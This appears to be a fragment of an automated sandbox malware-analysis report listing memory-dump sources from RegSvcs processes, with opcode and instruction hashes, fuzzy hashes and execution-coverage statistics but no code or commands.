                                                                                    • Opcode Fuzzy Hash: 2c462f95cd26f40ea5f1d7c8e62e78f4163d30c7af57517fc57b388f9eba11bd
                                                                                    • Instruction Fuzzy Hash: 8DC1D674E00218CFDB54DFA5C994B9DBBB2BF89300F2480AAD409AB3A5DB355E85CF50
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.629297965.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_4c0000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 17e21ff22600d4b810ec92a1aedf62fa55e23728b8c9800d7f508918fd5c66cf
                                                                                    • Instruction ID: e4980832757d227d83b571e21469f333542c7af71f88c1fcc0881ae99c5e637a
                                                                                    • Opcode Fuzzy Hash: 17e21ff22600d4b810ec92a1aedf62fa55e23728b8c9800d7f508918fd5c66cf
                                                                                    • Instruction Fuzzy Hash: B1C1C674E00218CFDB54DFA5C994B9DBBB2BF89300F2080AAD409AB3A5DB355E85CF50
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.629297965.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_4c0000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 3b39af0e28e41e282155e54064cd2344116c32217b57a6ebd47858e770e43261
                                                                                    • Instruction ID: e316ce7d538e2c368e580b208f44b23357085cfb842a429b9991d2a2456504bf
                                                                                    • Opcode Fuzzy Hash: 3b39af0e28e41e282155e54064cd2344116c32217b57a6ebd47858e770e43261
                                                                                    • Instruction Fuzzy Hash: 76C1C478E00218CFDB54DFA5C994B9DBBB2BF89300F2084AAD409AB395DB355E85CF50
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.629297965.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_4c0000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ee4956d85b2d6b623946461592634fe2a7964ea04cd3a76b5418f201fb120ddb
                                                                                    • Instruction ID: e4681c9f7f75cddbf7ca8eac04dcc5cfd6825a4cb113e9dab6f1e2672302b781
                                                                                    • Opcode Fuzzy Hash: ee4956d85b2d6b623946461592634fe2a7964ea04cd3a76b5418f201fb120ddb
                                                                                    • Instruction Fuzzy Hash: CCC1B278E00218CFDB54DFA5C995B9DBBB2BF89300F2080AAD409AB395DB355E85CF50
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.629297965.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_4c0000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8b1735a0fe434b34783c61e601d7e16b7f042f633af291e58e9c2d1cb928fe3b
                                                                                    • Instruction ID: a74dba73e58e89d3901ad98dde691774cf4b2e73f5f5ed06a0b36791cde915d9
                                                                                    • Opcode Fuzzy Hash: 8b1735a0fe434b34783c61e601d7e16b7f042f633af291e58e9c2d1cb928fe3b
                                                                                    • Instruction Fuzzy Hash: C6C1D578E00218CFDB54DFA5C994B9DBBB2BF89300F2081AAD409AB395DB355E85CF50
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.629297965.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_4c0000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2511586be953a3ab8829099fc3e6a0831509719a0884ea04dd462bcfe793f9a0
                                                                                    • Instruction ID: 55755c39f6b62c14aaff714bf765678e8a40b8adc34921dd14777fa105b958e6
                                                                                    • Opcode Fuzzy Hash: 2511586be953a3ab8829099fc3e6a0831509719a0884ea04dd462bcfe793f9a0
                                                                                    • Instruction Fuzzy Hash: 94C1D474E00218CFDB54DFA5C994B9DBBB2BF89301F6080AAD409AB3A5DB355E85CF50
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.629297965.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_4c0000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2a2468249991e1b34c055693b8a7a0f671b8ecc754a1b6dc932a0dabfcb69ad8
                                                                                    • Instruction ID: b7ab77a575762cb015bb8d21a2d59ad996459397088c52c2199b4a47c3b424e5
                                                                                    • Opcode Fuzzy Hash: 2a2468249991e1b34c055693b8a7a0f671b8ecc754a1b6dc932a0dabfcb69ad8
                                                                                    • Instruction Fuzzy Hash: CEC1C574E00218CFDB54DFA5C994B9DBBB2BF89300F2480AAD409AB395DB355E85CF54
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.629297965.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_4c0000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8349c02913f1837af50f30b84d2c47804ad7c959772074e43d68fb6143f74732
                                                                                    • Instruction ID: 27f0314470c291662f42e1f238ea16e7bc87c825d2c27001a6b7ef2ef4ecd9d7
                                                                                    • Opcode Fuzzy Hash: 8349c02913f1837af50f30b84d2c47804ad7c959772074e43d68fb6143f74732
                                                                                    • Instruction Fuzzy Hash: 42C1D578E00218CFDB54DFA5C994B9DBBB2BF89304F2084AAD409AB395DB355E85CF50
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.629297965.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_4c0000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7c3a3e50dc6580ca05d7349b8da9b0458fc9247f07372307903c30f2e566251b
                                                                                    • Instruction ID: f27230d9ea938cb862f3b5c1a8c2ae9e06f5da6845ee534093f66b3a1bf5a5d7
                                                                                    • Opcode Fuzzy Hash: 7c3a3e50dc6580ca05d7349b8da9b0458fc9247f07372307903c30f2e566251b
                                                                                    • Instruction Fuzzy Hash: E5C1C674E00218CFDB54DFA5C994B9DBBB2BF89300F2480AAD409AB355DB355E85CF54
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.629297965.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_4c0000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 34827dc3f8beade2c933a36b143a0fa9bbaec91ced1ade5ad627cf60d8d177af
                                                                                    • Instruction ID: 5552179016c41114c79dea3573ee6fd69cd5d2ebf8a7a5bdf496d72964a5cde1
                                                                                    • Opcode Fuzzy Hash: 34827dc3f8beade2c933a36b143a0fa9bbaec91ced1ade5ad627cf60d8d177af
                                                                                    • Instruction Fuzzy Hash: 80C1D774E00218CFDB54DFA5C994B9DBBB2BF89300F2080AAD409AB395DB755E85CF54
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.629297965.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_4c0000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 4ef40f3235d0e62b15614d235a2307ad3a01bf3e9a6c0dd5cb6a07edfbd2f6a1
                                                                                    • Instruction ID: 2702ba969fcae00d762a2efb77561fad80e4a88e8ad1d0e86f947f5773409ccf
                                                                                    • Opcode Fuzzy Hash: 4ef40f3235d0e62b15614d235a2307ad3a01bf3e9a6c0dd5cb6a07edfbd2f6a1
                                                                                    • Instruction Fuzzy Hash: 4BC1D574E00218CFDB54DFA5C994B9DBBB2BF89300F2484AAD409AB3A5DB355E85CF50
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.629297965.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false

                                                                                    Execution Graph

                                                                                    Execution Coverage:13.9%
                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                    Signature Coverage:0%
                                                                                    Total number of Nodes:18
                                                                                    Total number of Limit Nodes:0

                                                                                    Control-flow Graph

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.629236905.0000000000440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00440000, based on PE: false

                                                                                    Control-flow Graph

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.629236905.0000000000440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00440000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_440000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1d7dc2e7f19130468f7fcf03e219d6dba0fb34cbbe909a7152267b4ec08cb806
                                                                                    • Instruction ID: 00ea969dec8e90ec197e61271dc77261b5cb3a377bbc4a41d671f8be9ce4449c
                                                                                    • Opcode Fuzzy Hash: 1d7dc2e7f19130468f7fcf03e219d6dba0fb34cbbe909a7152267b4ec08cb806
                                                                                    • Instruction Fuzzy Hash: B0C1E674E01218CFDB54DFA5C994BADBBB2BF89300F2480AAD409AB395DB355E81CF54
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.629236905.0000000000440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00440000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_440000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d2a36fd05ba9cec792cf2847067be43eae317b6960908cff7c53d0a42fbb969d
                                                                                    • Instruction ID: 6d1990dd2df39361ced776a63e669f1a9c82418bc5ffee2dcfdc7c19bbf99a9b
                                                                                    • Opcode Fuzzy Hash: d2a36fd05ba9cec792cf2847067be43eae317b6960908cff7c53d0a42fbb969d
                                                                                    • Instruction Fuzzy Hash: 10A1A575E012188FEB68DF6AC944B9EFBF2AF89300F14C0AAD40CA7255DB345A85CF55
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.629236905.0000000000440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00440000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_440000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ce7f4f1bb6181f29b0db3d0a204b504256a0b0f3a0b991414fd49d70c02818a6
                                                                                    • Instruction ID: 1432f099e96f4361b7ef1dd47e606dfeefc48eed8b9a90b765b281d86de5f15e
                                                                                    • Opcode Fuzzy Hash: ce7f4f1bb6181f29b0db3d0a204b504256a0b0f3a0b991414fd49d70c02818a6
                                                                                    • Instruction Fuzzy Hash: A8A19474E012188FEB68DF6AC944B9EFBF2AF89300F14C1AAD40CA7255DB345A85CF55
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.629236905.0000000000440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00440000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_440000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 763c87da0695e636e8091eb552389c103610b4465563eb56127227ab01c06f73
                                                                                    • Instruction ID: b49df81d7d8536049a0d18e017d8e3c3efbee92b62eeaef9e476e24698b8898c
                                                                                    • Opcode Fuzzy Hash: 763c87da0695e636e8091eb552389c103610b4465563eb56127227ab01c06f73
                                                                                    • Instruction Fuzzy Hash: CEA1A474E012188FEB68DF6AC944B9EBBF2BF89300F14C0AAD40DA7255DB345A85CF15
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.629236905.0000000000440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00440000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_440000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0502d7087ce0c67285de67d62e975aa513ac79fb62ffd5a129a9e93a6f3cc2d8
                                                                                    • Instruction ID: 85865c1a3db689e6ebecca1cfbc7fcad4dbff5d79fc5041b9c23f2b53298a682
                                                                                    • Opcode Fuzzy Hash: 0502d7087ce0c67285de67d62e975aa513ac79fb62ffd5a129a9e93a6f3cc2d8
                                                                                    • Instruction Fuzzy Hash: B8A19574E012288FEB68DF6AC944B9DFBF2AF89300F14C0AAD40DA7255DB345A85CF55
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.629341790.0000000000560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00560000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_560000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8c4676efe5639f4ac6859604cd768f39c40e81bbc5093b6fbcf68325a9894117
                                                                                    • Instruction ID: eba49955745c24d740ff3445a39ea3e6bb9da8da5dfe66925dc06f6cc0916802
                                                                                    • Opcode Fuzzy Hash: 8c4676efe5639f4ac6859604cd768f39c40e81bbc5093b6fbcf68325a9894117
                                                                                    • Instruction Fuzzy Hash: D4A1A374E012288FEB68CF6AC944B9EFBF2BB89300F14D4AAD40DA7251D7345A85CF50
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.629341790.0000000000560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00560000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_560000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7a313a2731455b153001700b66228c25954dee951d49d1693f1e9db87165fbbb
                                                                                    • Instruction ID: 3d35a8e843e51ba9549477ff6f7bb8665911b10948b66b94d91a90931f2a8d1a
                                                                                    • Opcode Fuzzy Hash: 7a313a2731455b153001700b66228c25954dee951d49d1693f1e9db87165fbbb
                                                                                    • Instruction Fuzzy Hash: A4A19774E012188FEB68DF6AC944B9EBBF2BF89300F14D4AAD40CA7255DB345A85CF51
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.629236905.0000000000440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00440000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_440000_RegSvcs.jbxd
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.629236905.0000000000440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00440000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_440000_RegSvcs.jbxd
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.629341790.0000000000560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00560000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_560000_RegSvcs.jbxd
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.629341790.0000000000560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00560000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_560000_RegSvcs.jbxd

                                                                                    APIs
                                                                                    • KiUserExceptionDispatcher.NTDLL(000000FF), ref: 002DFE1A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.628915637.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_2d0000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID: DispatcherExceptionUser
                                                                                    • String ID:
                                                                                    • API String ID: 6842923-0

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.628915637.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_2d0000_RegSvcs.jbxd
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.629236905.0000000000440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00440000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_440000_RegSvcs.jbxd
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.628812672.000000000028D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0028D000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_28d000_RegSvcs.jbxd
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.628812672.000000000028D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0028D000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_28d000_RegSvcs.jbxd